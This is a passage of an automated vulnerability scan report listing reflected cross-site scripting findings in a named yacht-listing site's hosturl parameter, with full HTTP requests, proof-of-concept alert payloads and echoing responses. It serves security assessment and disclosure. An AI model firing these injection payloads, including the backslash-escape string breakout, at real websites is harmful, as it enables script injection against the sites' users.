The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload e9f24<script>alert(1)</script>85ccdba64cb was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachtse9f24<script>alert(1)</script>85ccdba64cb&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:53 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/galatiyachtse9f24<script>alert(1)</script>85ccdba64cb/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/galatiyachtse9f24<script>
...[SNIP]...

3.436. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0941"><script>alert(1)</script>f9c173fb8cc was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachtsf0941"><script>alert(1)</script>f9c173fb8cc&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
/listing/pl_display_photo.jsp?slim=broker&ybw=&boat_id=2030202&boatname=39%27+Tiara+Yachts+Convertible&photo_revised_date=1254582215000&photo_name=Salon&photo=2&hosturl=galatiyachtsf0941"><script>alert(1)</script>f9c173fb8cc&">
...[SNIP]...

3.437. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c25f5'><script>alert(1)</script>989701469 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachtsc25f5'><script>alert(1)</script>989701469&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:18 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=galatiyachtsc25f5'><script>alert(1)</script>989701469&slim=broker&boat_id=2030202&boatname=39%27+Tiara+Yachts+Convertible&photo_revised_date=1254582184000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.438. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba2e\'%3balert(1)//12eed5eda57 was submitted in the hosturl parameter. This input was echoed as 5ba2e\\';alert(1)//12eed5eda57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachts5ba2e\'%3balert(1)//12eed5eda57&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:25 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=galatiyachts5ba2e\\';alert(1)//12eed5eda57&slim=broker&boat_id=2030202&boatname=39%27+Tiara+Yachts+Convertible&photo_revised_date=1254582184000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.439. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 14df6--><script>alert(1)</script>cc1cf759883 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachts14df6--><script>alert(1)</script>cc1cf759883&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; 